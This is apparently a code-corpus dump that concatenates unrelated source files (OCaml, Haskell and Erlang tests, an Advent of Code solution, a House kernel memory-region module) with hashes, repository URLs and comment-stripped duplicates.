try ignore (Sys.getenv "TRAVIS_COMMIT"); true
with Not_found -> false
in
let in_appveyor =
try ignore (Sys.getenv "APPVEYOR_REPO_COMMIT"); true
with Not_found -> false
in
if not (in_travis || in_appveyor) then Lwt.return_true
else Lwt.return Lwt_config.libev_default);
]
let tests = selection_tests
let timing_tests = [
test "libev: timer delays are not too short" begin fun () ->
let start = Unix.gettimeofday () in
Lwt.catch
(fun () ->
Block the entire process for one second . If using libev , libev 's
notion of the current time is not updated during this period .
notion of the current time is not updated during this period. *)
let () = Unix.sleep 1 in
At this point , thinks that the time is what it was about one
second ago . Now schedule exception Lwt_unix . Timeout to be raised in
0.5 seconds . If the implementation is incorrect , the exception will
be raised immediately , because the 0.5 seconds will be measured
relative to libev 's " current " time of one second ago .
second ago. Now schedule exception Lwt_unix.Timeout to be raised in
0.5 seconds. If the implementation is incorrect, the exception will
be raised immediately, because the 0.5 seconds will be measured
relative to libev's "current" time of one second ago. *)
Lwt_unix.timeout 0.5)
(function
| Lwt_unix.Timeout ->
Lwt.return (Unix.gettimeofday ())
| exn ->
Lwt.fail exn)
>>= fun stop ->
Lwt.return (stop -. start >= 1.5)
end;
]
let tests = tests @ timing_tests
let run_tests = [
test "Lwt_main.run: nested call" ~sequential:true begin fun () ->
Lwt.pause () >>= fun () ->
try
Lwt_main.run (Lwt.return_unit);
Lwt.return_false
with Failure _ ->
Lwt.return_true
end;
]
let tests = tests @ run_tests
let suite = suite "lwt_engine" tests
|
1c280e27d7a611dcb79f8ade0ee076bb6c0f6ab66173d2188f9a4443623b0f76 | bcc32/advent-of-code | a.ml | open! Core
let rec dfs grid i j di dj back ~f =
let turn () =
match
[ i - 1, j; i, j - 1; i, j + 1; i + 1, j ]
|> List.filter ~f:(fun (x, y) ->
0 <= x && x < Array.length grid && 0 <= y && y < String.length grid.(x))
|> List.filter ~f:(fun (x, y) ->
not ([%equal: (int * int) option] (Some (x, y)) back))
|> List.filter ~f:(fun (x, y) -> Char.( <> ) grid.(x).[y] ' ')
with
| [] -> () (* done *)
| [ (i', j') ] -> dfs grid i' j' (i' - i) (j' - j) (Some (i, j)) ~f
| l -> raise_s [%message (l : (int * int) list) (i : int) (j : int)]
in
let proceed () =
match grid.(i + di).[j + dj] with
| ' ' -> turn ()
| exception _ -> turn ()
| _ -> dfs grid (i + di) (j + dj) di dj (Some (i, j)) ~f
in
match grid.(i).[j] with
| 'A' .. 'Z' as c ->
f c;
proceed ()
| '-' | '|' | '+' -> proceed ()
| ' ' -> ()
| exception _ -> ()
| c -> invalid_arg (String.of_char c)
;;
let () =
let input =
In_channel.with_file (Sys.get_argv ()).(1) ~f:In_channel.input_lines |> Array.of_list
in
let letters = ref [] in
for j = 0 to String.length input.(0) do
dfs input 0 j 1 0 None ~f:(fun letter -> letters := letter :: !letters)
done;
!letters |> List.rev |> String.of_char_list |> print_endline
;;
| null | https://raw.githubusercontent.com/bcc32/advent-of-code/653c0f130e2fb2f599d4e76804e02af54c9bb19f/2017/19/a.ml | ocaml | done | open! Core
let rec dfs grid i j di dj back ~f =
let turn () =
match
[ i - 1, j; i, j - 1; i, j + 1; i + 1, j ]
|> List.filter ~f:(fun (x, y) ->
0 <= x && x < Array.length grid && 0 <= y && y < String.length grid.(x))
|> List.filter ~f:(fun (x, y) ->
not ([%equal: (int * int) option] (Some (x, y)) back))
|> List.filter ~f:(fun (x, y) -> Char.( <> ) grid.(x).[y] ' ')
with
| [ (i', j') ] -> dfs grid i' j' (i' - i) (j' - j) (Some (i, j)) ~f
| l -> raise_s [%message (l : (int * int) list) (i : int) (j : int)]
in
let proceed () =
match grid.(i + di).[j + dj] with
| ' ' -> turn ()
| exception _ -> turn ()
| _ -> dfs grid (i + di) (j + dj) di dj (Some (i, j)) ~f
in
match grid.(i).[j] with
| 'A' .. 'Z' as c ->
f c;
proceed ()
| '-' | '|' | '+' -> proceed ()
| ' ' -> ()
| exception _ -> ()
| c -> invalid_arg (String.of_char c)
;;
let () =
let input =
In_channel.with_file (Sys.get_argv ()).(1) ~f:In_channel.input_lines |> Array.of_list
in
let letters = ref [] in
for j = 0 to String.length input.(0) do
dfs input 0 j 1 0 None ~f:(fun letter -> letters := letter :: !letters)
done;
!letters |> List.rev |> String.of_char_list |> print_endline
;;
|
f7f85aabb47e1c3fa198c554c809165458901f9602330599f7cf079b34a6f876 | ygmpkk/house | MemRegion.hs | | Memory regions for memory - mapped IO and other reserved memory
( section 3.4 in the paper )
module H.MemRegion(
H,
withTempRegion ,
pokeByteOff,peekByteOff,pokeElemOff,peekElemOff,moveBytes,copyArray,
fillRegion,pokeArray,
uncheckedPokeElemOff,
Storable,SafePtr,safePtr,peek,poke,
-- * Deprecated
pokeByteIntOff,peekByteIntOff,pokeElemIntOff,peekElemIntOff
) where
import qualified H.AdHocMem as U
import H.AdHocMem(H,Ptr,castPtr,plusPtr,allocaArray)
import Foreign.Storable(Storable,sizeOf)
import Data.Word(Word8,Word32)
import Data.Array.IArray(bounds,(!))
import Data.Ix(rangeSize)
For SPECIALIZE pragma :
import Data.Array.Unboxed(UArray)
import Data.Word(Word8,Word16,Word32)
-------------------------- INTERFACE -------------------------------------------
---- Memory regions ----
type MemRegion
type Offset = Word32
type Size = Word32
createRegion :: Ptr Word8 -> Offset -> MemRegion -- unsafe!
regionSize :: MemRegion -> Offset
--withTempRegion :: Size -> (MemRegion->H ()) -> H ()
-- It's unsafe to return the temporary region.
--- Accessing a memory region, requires dynamic safety checks:
pokeByteOff :: Storable a => MemRegion -> Offset -> a -> H ()
peekByteOff :: Storable a => MemRegion -> Offset -> H a
pokeElemOff :: Storable a => MemRegion -> Offset -> a -> H ()
peekElemOff :: Storable a => MemRegion -> Offset -> H a
uncheckedPokeElemOff :: Storable a => MemRegion -> Offset -> a -> H () --unsafe!
moveBytes :: MemRegion->Offset->MemRegion->Offset->Size-> H ()
copyArray :: Storable a => MemRegion->Offset->Ptr a ->Size-> H ()
--- Accessing memory with signed Int offsets, not recommended
# DEPRECATED pokeByteIntOff , peekByteIntOff , pokeElemIntOff , peekElemIntOff
" Use Offset ( ) instead of Int for memory region offsets " #
"Use Offset (Word32) instead of Int for memory region offsets" #-}
pokeByteIntOff :: (Storable a) => MemRegion -> Int -> a -> H ()
peekByteIntOff :: (Storable a) => MemRegion -> Int -> H a
pokeElemIntOff :: (Storable a) => MemRegion -> Int -> a -> H ()
peekElemIntOff :: (Storable a) => MemRegion -> Int -> H a
---- Safe Pointers ----
type SafePtr a
--- Creating a safe pointer, requires a dynamic safety check
safePtr :: Storable a => MemRegion -> Offset -> H (SafePtr a)
--- Access to memory via safe pointers, free from dynamic checks
poke :: (Storable a) => (SafePtr a) -> a -> H ()
peek :: (Storable a) => (SafePtr a) -> H a
-------------------------- IMPLEMENTATION --------------------------------------
data MemRegion = MR { base:: !(Ptr Word8), size:: !Size }
deriving Show
newtype SafePtr a = SafePtr (Ptr a)
Usafe :
createRegion = MR -- could also check for overlap with known regions
regionSize = size
withTempRegion size h = allocaArray ( w2i size ) ( \ p - > h ( MR p size ) )
safePtr (MR base size) o =
case base +. o of
p -> if o+s<=size
then return (SafePtr p)
else fail "Trying to create pointer to object outside region"
where
s = elSize (deref p)
deref :: Ptr a -> a -- just a type checking trick
deref = undefined
poke (SafePtr p) = U.poke p
peek (SafePtr p) = U.peek p
pokeByteOff mr o x =
do p <- safePtr mr o
poke p x
peekByteOff mr o =
do p <- safePtr mr o
peek p
pokeElemOff mr o x = pokeByteOff mr (o*elSize x) x
{-
pokeElemOff (MR base size) eo x | o+s<=size = U.pokeByteOff base (w2i o) x
where --"pokeElemOff outside region"
s = elSize x
o = eo*s
-}
uncheckedPokeElemOff (MR base _) o x =
U.pokeElemOff (castPtr base) (w2i o) x
peekElemOff mr o = peekElemOff' mr o undefined
where
peekElemOff' :: (Storable a) => MemRegion -> Word32 -> a -> H a
peekElemOff' mr o dummy = peekByteOff mr (o*elSize dummy)
pokeByteIntOff mr o | o>=0 = pokeByteOff mr (i2w o)
peekByteIntOff mr o | o>=0 = peekByteOff mr (i2w o)
pokeElemIntOff mr o | o>=0 = pokeElemOff mr (i2w o)
peekElemIntOff mr o | o>=0 = peekElemOff mr (i2w o)
moveBytes dstr dsto srcr srco n =
do dst <- safePtr' dstr dsto n
src <- safePtr' srcr srco n
U.moveBytes dst src (w2i n)
safePtr' :: MemRegion -> Offset -> Offset -> H (Ptr Word8)
safePtr' (MR base size) o esize =
if o+esize<=size
then return (base +. o)
else fail "Trying to create pointer to object outside region"
copyArray dstr dsto ptr n = copyArray' dstr dsto ptr undefined n
where
copyArray' :: Storable a=>MemRegion->Offset->Ptr a->a->Offset->H ()
copyArray' dstr dsto src dummy n =
do let el=elSize dummy
bcnt = n*el
dst <- safePtr' dstr (dsto*el) bcnt
U.moveBytes dst (castPtr src) (w2i bcnt)
fillRegion (MR b s) x =
sequence_ [U.pokeElemOff (castPtr b) i x|i<-[0..w2i s `div` sizeOf x]]
pokeArray mr o a =
do dst <- safePtr' mr o (elSize (a!undefined)*cnt)
U.pokeArray (castPtr dst) a
where
cnt = i2w $ rangeSize (bounds a)
type PokeArray d = MemRegion -> Offset -> UArray Int d -> H ()
{-# SPECIALIZE pokeArray :: PokeArray Word8 #-}
{-# SPECIALIZE pokeArray :: PokeArray Word16 #-}
{-# SPECIALIZE pokeArray :: PokeArray Word32 #-}
Unsigned versions of plusPtr and :
p +. n = plusPtr p (w2i n)
elSize x = i2w (sizeOf x)
--- fromIntegral is such a loooong name...
i2w :: Int->Word32
w2i :: Word32->Int
i2w = fromIntegral
w2i = fromIntegral
| null | https://raw.githubusercontent.com/ygmpkk/house/1ed0eed82139869e85e3c5532f2b579cf2566fa2/kernel/H/MemRegion.hs | haskell | * Deprecated
------------------------ INTERFACE -------------------------------------------
-- Memory regions ----
unsafe!
withTempRegion :: Size -> (MemRegion->H ()) -> H ()
It's unsafe to return the temporary region.
- Accessing a memory region, requires dynamic safety checks:
unsafe!
- Accessing memory with signed Int offsets, not recommended
-- Safe Pointers ----
- Creating a safe pointer, requires a dynamic safety check
- Access to memory via safe pointers, free from dynamic checks
------------------------ IMPLEMENTATION --------------------------------------
could also check for overlap with known regions
just a type checking trick
pokeElemOff (MR base size) eo x | o+s<=size = U.pokeByteOff base (w2i o) x
where --"pokeElemOff outside region"
s = elSize x
o = eo*s
# SPECIALIZE pokeArray :: PokeArray Word8 #
# SPECIALIZE pokeArray :: PokeArray Word16 #
# SPECIALIZE pokeArray :: PokeArray Word32 #
- fromIntegral is such a loooong name... | | Memory regions for memory - mapped IO and other reserved memory
( section 3.4 in the paper )
module H.MemRegion(
H,
withTempRegion ,
pokeByteOff,peekByteOff,pokeElemOff,peekElemOff,moveBytes,copyArray,
fillRegion,pokeArray,
uncheckedPokeElemOff,
Storable,SafePtr,safePtr,peek,poke,
pokeByteIntOff,peekByteIntOff,pokeElemIntOff,peekElemIntOff
) where
import qualified H.AdHocMem as U
import H.AdHocMem(H,Ptr,castPtr,plusPtr,allocaArray)
import Foreign.Storable(Storable,sizeOf)
import Data.Word(Word8,Word32)
import Data.Array.IArray(bounds,(!))
import Data.Ix(rangeSize)
For SPECIALIZE pragma :
import Data.Array.Unboxed(UArray)
import Data.Word(Word8,Word16,Word32)
type MemRegion
type Offset = Word32
type Size = Word32
regionSize :: MemRegion -> Offset
pokeByteOff :: Storable a => MemRegion -> Offset -> a -> H ()
peekByteOff :: Storable a => MemRegion -> Offset -> H a
pokeElemOff :: Storable a => MemRegion -> Offset -> a -> H ()
peekElemOff :: Storable a => MemRegion -> Offset -> H a
moveBytes :: MemRegion->Offset->MemRegion->Offset->Size-> H ()
copyArray :: Storable a => MemRegion->Offset->Ptr a ->Size-> H ()
# DEPRECATED pokeByteIntOff , peekByteIntOff , pokeElemIntOff , peekElemIntOff
" Use Offset ( ) instead of Int for memory region offsets " #
"Use Offset (Word32) instead of Int for memory region offsets" #-}
pokeByteIntOff :: (Storable a) => MemRegion -> Int -> a -> H ()
peekByteIntOff :: (Storable a) => MemRegion -> Int -> H a
pokeElemIntOff :: (Storable a) => MemRegion -> Int -> a -> H ()
peekElemIntOff :: (Storable a) => MemRegion -> Int -> H a
type SafePtr a
safePtr :: Storable a => MemRegion -> Offset -> H (SafePtr a)
poke :: (Storable a) => (SafePtr a) -> a -> H ()
peek :: (Storable a) => (SafePtr a) -> H a
data MemRegion = MR { base:: !(Ptr Word8), size:: !Size }
deriving Show
newtype SafePtr a = SafePtr (Ptr a)
Usafe :
regionSize = size
withTempRegion size h = allocaArray ( w2i size ) ( \ p - > h ( MR p size ) )
safePtr (MR base size) o =
case base +. o of
p -> if o+s<=size
then return (SafePtr p)
else fail "Trying to create pointer to object outside region"
where
s = elSize (deref p)
deref = undefined
poke (SafePtr p) = U.poke p
peek (SafePtr p) = U.peek p
pokeByteOff mr o x =
do p <- safePtr mr o
poke p x
peekByteOff mr o =
do p <- safePtr mr o
peek p
pokeElemOff mr o x = pokeByteOff mr (o*elSize x) x
uncheckedPokeElemOff (MR base _) o x =
U.pokeElemOff (castPtr base) (w2i o) x
peekElemOff mr o = peekElemOff' mr o undefined
where
peekElemOff' :: (Storable a) => MemRegion -> Word32 -> a -> H a
peekElemOff' mr o dummy = peekByteOff mr (o*elSize dummy)
pokeByteIntOff mr o | o>=0 = pokeByteOff mr (i2w o)
peekByteIntOff mr o | o>=0 = peekByteOff mr (i2w o)
pokeElemIntOff mr o | o>=0 = pokeElemOff mr (i2w o)
peekElemIntOff mr o | o>=0 = peekElemOff mr (i2w o)
moveBytes dstr dsto srcr srco n =
do dst <- safePtr' dstr dsto n
src <- safePtr' srcr srco n
U.moveBytes dst src (w2i n)
safePtr' :: MemRegion -> Offset -> Offset -> H (Ptr Word8)
safePtr' (MR base size) o esize =
if o+esize<=size
then return (base +. o)
else fail "Trying to create pointer to object outside region"
copyArray dstr dsto ptr n = copyArray' dstr dsto ptr undefined n
where
copyArray' :: Storable a=>MemRegion->Offset->Ptr a->a->Offset->H ()
copyArray' dstr dsto src dummy n =
do let el=elSize dummy
bcnt = n*el
dst <- safePtr' dstr (dsto*el) bcnt
U.moveBytes dst (castPtr src) (w2i bcnt)
fillRegion (MR b s) x =
sequence_ [U.pokeElemOff (castPtr b) i x|i<-[0..w2i s `div` sizeOf x]]
pokeArray mr o a =
do dst <- safePtr' mr o (elSize (a!undefined)*cnt)
U.pokeArray (castPtr dst) a
where
cnt = i2w $ rangeSize (bounds a)
type PokeArray d = MemRegion -> Offset -> UArray Int d -> H ()
Unsigned versions of plusPtr and :
p +. n = plusPtr p (w2i n)
elSize x = i2w (sizeOf x)
i2w :: Int->Word32
w2i :: Word32->Int
i2w = fromIntegral
w2i = fromIntegral
|
a6072ab640dc074e487da82883a63671db473f8e10ed5b197cd8e012a5bfa1de | tek/chiasma | ProcessError.hs | module Chiasma.Data.ProcessError where
data ProcessError =
Terminated Text
deriving stock (Eq, Show)
| null | https://raw.githubusercontent.com/tek/chiasma/51751e19a416a9afe12f7797df8a67990b266240/packages/chiasma/lib/Chiasma/Data/ProcessError.hs | haskell | module Chiasma.Data.ProcessError where
data ProcessError =
Terminated Text
deriving stock (Eq, Show)
| |
10f325e583476f0e8b4bd2be4fc37f22ead597af37b91125fbefeb79650c7fb7 | mbj/stratosphere | CloudWatchDestinationProperty.hs | module Stratosphere.SES.ConfigurationSetEventDestination.CloudWatchDestinationProperty (
module Exports, CloudWatchDestinationProperty(..),
mkCloudWatchDestinationProperty
) where
import qualified Data.Aeson as JSON
import qualified Stratosphere.Prelude as Prelude
import Stratosphere.Property
import {-# SOURCE #-} Stratosphere.SES.ConfigurationSetEventDestination.DimensionConfigurationProperty as Exports
import Stratosphere.ResourceProperties
data CloudWatchDestinationProperty
= CloudWatchDestinationProperty {dimensionConfigurations :: (Prelude.Maybe [DimensionConfigurationProperty])}
mkCloudWatchDestinationProperty :: CloudWatchDestinationProperty
mkCloudWatchDestinationProperty
= CloudWatchDestinationProperty
{dimensionConfigurations = Prelude.Nothing}
instance ToResourceProperties CloudWatchDestinationProperty where
toResourceProperties CloudWatchDestinationProperty {..}
= ResourceProperties
{awsType = "AWS::SES::ConfigurationSetEventDestination.CloudWatchDestination",
supportsTags = Prelude.False,
properties = Prelude.fromList
(Prelude.catMaybes
[(JSON..=) "DimensionConfigurations"
Prelude.<$> dimensionConfigurations])}
instance JSON.ToJSON CloudWatchDestinationProperty where
toJSON CloudWatchDestinationProperty {..}
= JSON.object
(Prelude.fromList
(Prelude.catMaybes
[(JSON..=) "DimensionConfigurations"
Prelude.<$> dimensionConfigurations]))
instance Property "DimensionConfigurations" CloudWatchDestinationProperty where
type PropertyType "DimensionConfigurations" CloudWatchDestinationProperty = [DimensionConfigurationProperty]
set newValue CloudWatchDestinationProperty {}
= CloudWatchDestinationProperty
{dimensionConfigurations = Prelude.pure newValue, ..} | null | https://raw.githubusercontent.com/mbj/stratosphere/c70f301715425247efcda29af4f3fcf7ec04aa2f/services/ses/gen/Stratosphere/SES/ConfigurationSetEventDestination/CloudWatchDestinationProperty.hs | haskell | # SOURCE # | module Stratosphere.SES.ConfigurationSetEventDestination.CloudWatchDestinationProperty (
module Exports, CloudWatchDestinationProperty(..),
mkCloudWatchDestinationProperty
) where
import qualified Data.Aeson as JSON
import qualified Stratosphere.Prelude as Prelude
import Stratosphere.Property
import Stratosphere.ResourceProperties
data CloudWatchDestinationProperty
= CloudWatchDestinationProperty {dimensionConfigurations :: (Prelude.Maybe [DimensionConfigurationProperty])}
mkCloudWatchDestinationProperty :: CloudWatchDestinationProperty
mkCloudWatchDestinationProperty
= CloudWatchDestinationProperty
{dimensionConfigurations = Prelude.Nothing}
instance ToResourceProperties CloudWatchDestinationProperty where
toResourceProperties CloudWatchDestinationProperty {..}
= ResourceProperties
{awsType = "AWS::SES::ConfigurationSetEventDestination.CloudWatchDestination",
supportsTags = Prelude.False,
properties = Prelude.fromList
(Prelude.catMaybes
[(JSON..=) "DimensionConfigurations"
Prelude.<$> dimensionConfigurations])}
instance JSON.ToJSON CloudWatchDestinationProperty where
toJSON CloudWatchDestinationProperty {..}
= JSON.object
(Prelude.fromList
(Prelude.catMaybes
[(JSON..=) "DimensionConfigurations"
Prelude.<$> dimensionConfigurations]))
instance Property "DimensionConfigurations" CloudWatchDestinationProperty where
type PropertyType "DimensionConfigurations" CloudWatchDestinationProperty = [DimensionConfigurationProperty]
set newValue CloudWatchDestinationProperty {}
= CloudWatchDestinationProperty
{dimensionConfigurations = Prelude.pure newValue, ..} |
ada2ff384cc53fe89d8b86ebcdbc9fa71e9475e72cd02a31ef1f90d7e5bdfe49 | josefs/Gradualizer | map_literal.erl | -module(map_literal).
-export([f/0]).
-spec f() -> ok.
f() -> #{apa => bepa}.
| null | https://raw.githubusercontent.com/josefs/Gradualizer/208f5816b0157f282212fc036ba7560f0822f9fc/test/should_fail/map_literal.erl | erlang | -module(map_literal).
-export([f/0]).
-spec f() -> ok.
f() -> #{apa => bepa}.
| |
33bfe90530f21463f60ae3af7a71cace23464025a110fce6758a64da3bb4bd15 | AdRoll/rebar3_format | long_specs.erl | -module(long_specs).
-compile(export_all).
-callback handle_call(term(), {pid(), reference()}, state()) -> {reply, Reply, state()} | {stop, unexpected_call, state()} when Reply :: ok | {error, {already_registered, pid()}}.
-spec handle_call(term(), {pid(), reference()}, state()) -> {reply, Reply, state()} | {stop, unexpected_call, state()} when Reply :: ok | {error, {already_registered, pid()}}.
handle_call(_, _, _) ->
ok.
-callback metric(Name, Value, Type) -> Result when Name :: binary(), Value :: value(), Type :: metric_type(), Result :: ok.
-spec metric(Name, Value, Type) -> Result when Name :: binary(), Value :: value(), Type :: metric_type(), Result :: ok.
metric(_, _, _) ->
ok.
-callback send(Name :: binary(), Value :: binary(), Type :: metric_type(), Tags :: [bin_kv()]) -> ok.
-spec send(Name :: binary(), Value :: binary(), Type :: metric_type(), Tags :: [bin_kv()]) -> ok.
send(_, _, _, _) ->
ok.
-callback something(With, Multiple, Clauses) -> Result when With :: with, Multiple :: multiple, Clauses :: clauses, Result :: result;
(With, Multiple, Clauses) -> Result when With :: [with], Multiple :: [multiple], Clauses :: [clauses], Result :: [result];
({With :: with}, {Multiple :: multiple}, {Clauses :: clauses}) -> {Result :: result}.
-spec something(With, Multiple, Clauses) -> Result when With :: with, Multiple :: multiple, Clauses :: clauses, Result :: result;
(With, Multiple, Clauses) -> Result when With :: [with], Multiple :: [multiple], Clauses :: [clauses], Result :: [result];
({With :: with}, {Multiple :: multiple}, {Clauses :: clauses}) -> {Result :: result}.
something(_, _, _) ->
result.
| null | https://raw.githubusercontent.com/AdRoll/rebar3_format/5ffb11341796173317ae094d4e165b85fad6aa19/test_app/src/long_specs.erl | erlang | -module(long_specs).
-compile(export_all).
-callback handle_call(term(), {pid(), reference()}, state()) -> {reply, Reply, state()} | {stop, unexpected_call, state()} when Reply :: ok | {error, {already_registered, pid()}}.
-spec handle_call(term(), {pid(), reference()}, state()) -> {reply, Reply, state()} | {stop, unexpected_call, state()} when Reply :: ok | {error, {already_registered, pid()}}.
handle_call(_, _, _) ->
ok.
-callback metric(Name, Value, Type) -> Result when Name :: binary(), Value :: value(), Type :: metric_type(), Result :: ok.
-spec metric(Name, Value, Type) -> Result when Name :: binary(), Value :: value(), Type :: metric_type(), Result :: ok.
metric(_, _, _) ->
ok.
-callback send(Name :: binary(), Value :: binary(), Type :: metric_type(), Tags :: [bin_kv()]) -> ok.
-spec send(Name :: binary(), Value :: binary(), Type :: metric_type(), Tags :: [bin_kv()]) -> ok.
send(_, _, _, _) ->
ok.
-callback something(With, Multiple, Clauses) -> Result when With :: with, Multiple :: multiple, Clauses :: clauses, Result :: result;
(With, Multiple, Clauses) -> Result when With :: [with], Multiple :: [multiple], Clauses :: [clauses], Result :: [result];
({With :: with}, {Multiple :: multiple}, {Clauses :: clauses}) -> {Result :: result}.
-spec something(With, Multiple, Clauses) -> Result when With :: with, Multiple :: multiple, Clauses :: clauses, Result :: result;
(With, Multiple, Clauses) -> Result when With :: [with], Multiple :: [multiple], Clauses :: [clauses], Result :: [result];
({With :: with}, {Multiple :: multiple}, {Clauses :: clauses}) -> {Result :: result}.
something(_, _, _) ->
result.
| |
8b67f12085e77b4f66677c13e40db02676d4976d6791f7022d72ee480d44c0c9 | aeternity/mnesia_leveled | mnesia_leveled_conv_bigtab.erl | %%----------------------------------------------------------------
Copyright ( c ) 2013 - 2016 Klarna AB
%%
This file is provided to you under the Apache License ,
%% Version 2.0 (the "License"); you may not use this file
except in compliance with the License . You may obtain
%% a copy of the License at
%%
%% -2.0
%%
%% Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
" AS IS " BASIS , WITHOUT WARRANTIES OR CONDITIONS OF ANY
%% KIND, either express or implied. See the License for the
%% specific language governing permissions and limitations
%% under the License.
%%----------------------------------------------------------------
-module(mnesia_leveled_conv_bigtab).
-export([init/0, mktab/2, run/1]).
-record(t, {k, i, v}).
run(Sz) ->
mnesia:stop(),
init(),
mktab(disc_copies, Sz),
mnesia:change_table_copy_type(t, node(), led).
init() ->
mnesia_leveled_tlib:start_mnesia(reset).
mktab(Backend, Sz) ->
mnesia_leveled_tlib:create_table(Backend, [k, i, v], [i]),
fill_table(Sz).
fill_table(Sz) when is_integer(Sz), Sz > 0 ->
fill_table(1, Sz).
fill_table(N, Max) when N =< Max ->
mnesia:dirty_write(#t{k = N, i = N, v = val()}),
fill_table(N+1, Max);
fill_table(N, _) when is_integer(N) ->
ok.
val() ->
{1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0}.
| null | https://raw.githubusercontent.com/aeternity/mnesia_leveled/11c480b5546ed6087ae688e8596bd596a1f7bdd1/test/mnesia_leveled_conv_bigtab.erl | erlang | ----------------------------------------------------------------
Version 2.0 (the "License"); you may not use this file
a copy of the License at
-2.0
Unless required by applicable law or agreed to in writing,
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
---------------------------------------------------------------- | Copyright ( c ) 2013 - 2016 Klarna AB
This file is provided to you under the Apache License ,
except in compliance with the License . You may obtain
software distributed under the License is distributed on an
" AS IS " BASIS , WITHOUT WARRANTIES OR CONDITIONS OF ANY
-module(mnesia_leveled_conv_bigtab).
-export([init/0, mktab/2, run/1]).
-record(t, {k, i, v}).
run(Sz) ->
mnesia:stop(),
init(),
mktab(disc_copies, Sz),
mnesia:change_table_copy_type(t, node(), led).
init() ->
mnesia_leveled_tlib:start_mnesia(reset).
mktab(Backend, Sz) ->
mnesia_leveled_tlib:create_table(Backend, [k, i, v], [i]),
fill_table(Sz).
fill_table(Sz) when is_integer(Sz), Sz > 0 ->
fill_table(1, Sz).
fill_table(N, Max) when N =< Max ->
mnesia:dirty_write(#t{k = N, i = N, v = val()}),
fill_table(N+1, Max);
fill_table(N, _) when is_integer(N) ->
ok.
val() ->
{1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0}.
|
a81e61b7a1c78f967bd8b4f22b1e79b019f952af1c00d722a5dd5ec89189cab8 | janestreet/memtrace_viewer_with_deps | test_day_of_week.ml | open! Core_kernel
open! Import
open! Day_of_week
let num_days_in_week = 7
let%test_module "Day_of_week.V1" =
(module Stable_unit_test.Make (struct
include Stable.V1
let equal = [%compare.equal: t]
let tests =
[ Sun, "SUN", "\000"
; Mon, "MON", "\001"
; Tue, "TUE", "\002"
; Wed, "WED", "\003"
; Thu, "THU", "\004"
; Fri, "FRI", "\005"
; Sat, "SAT", "\006"
]
;;
end))
;;
let%test _ = List.is_sorted all ~compare
let%test "to_string_long output parses with of_string" =
List.for_all all ~f:(fun d -> d = (to_string_long d |> of_string))
;;
let%test _ = Int.(num_days ~from:Mon ~to_:Tue = 1)
let%test _ = Int.(num_days ~from:Tue ~to_:Mon = 6)
let%test "num_days is inverse to shift" =
let all_days = [ Sun; Mon; Tue; Wed; Thu; Fri; Sat ] in
List.for_all (List.cartesian_product all_days all_days) ~f:(fun (from, to_) ->
let i = num_days ~from ~to_ in
Int.(0 <= i && i < num_days_in_week) && shift from i = to_)
;;
| null | https://raw.githubusercontent.com/janestreet/memtrace_viewer_with_deps/5a9e1f927f5f8333e2d71c8d3ca03a45587422c4/vendor/core_kernel/test/src/test_day_of_week.ml | ocaml | open! Core_kernel
open! Import
open! Day_of_week
let num_days_in_week = 7
let%test_module "Day_of_week.V1" =
(module Stable_unit_test.Make (struct
include Stable.V1
let equal = [%compare.equal: t]
let tests =
[ Sun, "SUN", "\000"
; Mon, "MON", "\001"
; Tue, "TUE", "\002"
; Wed, "WED", "\003"
; Thu, "THU", "\004"
; Fri, "FRI", "\005"
; Sat, "SAT", "\006"
]
;;
end))
;;
let%test _ = List.is_sorted all ~compare
let%test "to_string_long output parses with of_string" =
List.for_all all ~f:(fun d -> d = (to_string_long d |> of_string))
;;
let%test _ = Int.(num_days ~from:Mon ~to_:Tue = 1)
let%test _ = Int.(num_days ~from:Tue ~to_:Mon = 6)
let%test "num_days is inverse to shift" =
let all_days = [ Sun; Mon; Tue; Wed; Thu; Fri; Sat ] in
List.for_all (List.cartesian_product all_days all_days) ~f:(fun (from, to_) ->
let i = num_days ~from ~to_ in
Int.(0 <= i && i < num_days_in_week) && shift from i = to_)
;;
| |
960fc5458f83f0ffe5248524b06a2a06f5073cc870d5b628f39ae4f7ec82b203 | ndmitchell/shake | Cache.hs |
module Test.Cache(main) where
import Development.Shake
import Development.Shake.FilePath
import System.Directory
import Data.Char
import Test.Type
main = testBuild test $ do
vowels <- newCache $ \file -> do
src <- readFile' file
liftIO $ appendFile "trace.txt" "1"
pure $ length $ filter isDigit src
"*.out*" %> \x ->
writeFile' x . show =<< vowels (dropExtension x <.> "txt")
startCompiler <- newCache $ \() -> do
liftIO $ writeFile "compiler.txt" "on"
runAfter $ writeFile "compiler.txt" "off"
"*.lang" %> \out -> do
startCompiler ()
liftIO $ copyFile "compiler.txt" out
-- Bug fixed in
bug796_2 <- newCache $ \() -> do
readFile' "bug796.2"
"bug796" %> \out -> do
a <- readFile' "bug796.1"
b <- bug796_2 ()
writeFile' out $ a ++ b
test build = do
build ["clean"]
writeFile "trace.txt" ""
writeFile "vowels.txt" "abc123a"
build ["vowels.out1","vowels.out2","-j3","--sleep"]
assertContents "trace.txt" "1"
assertContents "vowels.out1" "3"
assertContents "vowels.out2" "3"
build ["vowels.out2","-j3"]
assertContents "trace.txt" "1"
assertContents "vowels.out1" "3"
writeFile "vowels.txt" "12xyz34"
build ["vowels.out2","-j3","--sleep"]
assertContents "trace.txt" "11"
assertContents "vowels.out2" "4"
build ["vowels.out1","-j3","--sleep"]
assertContents "trace.txt" "111"
assertContents "vowels.out1" "4"
build ["foo.lang","bar.lang"]
assertContents "foo.lang" "on"
assertContents "compiler.txt" "off"
writeFile "compiler.txt" "unstarted"
build ["foo.lang","bar.lang"]
assertContents "compiler.txt" "unstarted"
writeFile "bug796.1" "a"
writeFile "bug796.2" "b"
build ["bug796", "--sleep"]
